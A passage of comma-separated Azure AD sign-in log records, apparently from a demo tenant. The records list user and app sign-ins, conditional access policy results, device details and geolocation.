+779,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:41.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,f26e8ccc-741e-4c87-b0da-520f66553eab,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d4fae351-3d73-4ab0-b2af-7ae1b0aa0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,d4fae351-3d73-4ab0-b2af-7ae1b0aa0c00,SigninLogs,Sucess,50.6406517,5.572050095
+780,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:44.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,108a7bc4-64fe-45e5-858f-628a45a0e497,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d4fae351-3d73-4ab0-b2af-7ae1d8aa0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,d4fae351-3d73-4ab0-b2af-7ae1d8aa0c00,SigninLogs,Sucess,50.6406517,5.572050095
+781,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:48.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a43aa7e1-af32-4941-b7eb-3e4289b53756,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d4fae351-3d73-4ab0-b2af-7ae112ab0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,d4fae351-3d73-4ab0-b2af-7ae112ab0c00,SigninLogs,Sucess,50.6406517,5.572050095
+782,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,08:38.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,75104a07-0166-4705-8b05-6064cadcd4b7,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office Online Client AAD- Maker,17d5e35f-655b-4fb0-8ae6-86356e9a49f5,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:08,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",d4fae351-3d73-4ab0-b2af-7ae119ae0c00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office Scripts Service,d4fae351-3d73-4ab0-b2af-7ae119ae0c00,SigninLogs,Sucess,50.6406517,5.572050095
+783,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,32:45.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5914cebe-7d87-4859-bd4e-caf1648397eb,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 09:32,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",46ab66bf-13d5-46c8-a514-03b7399c0e00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,46ab66bf-13d5-46c8-a514-03b7399c0e00,SigninLogs,Sucess,50.6406517,5.572050095
+784,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,07:44.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,e0778610-ce8a-4516-86c7-d8c11bf2b611,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 08:07,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",e3e64b68-7d91-478e-bf30-aa3bd6c30b00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the token'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,e3e64b68-7d91-478e-bf30-aa3bd6c30b00,SigninLogs,Sucess,50.6406517,5.572050095
+785,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:16.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0ec3876e-72b1-4174-b70b-e0ce31414ecc,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 08:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8361f2d3-1959-4242-988e-de2dab2e0e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8361f2d3-1959-4242-988e-de2dab2e0e00,SigninLogs,Sucess,36.6404686,-78.26995087
+786,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:17.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,3b8be8a8-ef28-453d-b76d-658753bb1e07,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 08:51,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",ace1d4a5-fd0b-463d-bfa6-011c97aa0f00,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 0, 'additionalDetails': 'MFA requirement satisfied by claim in the 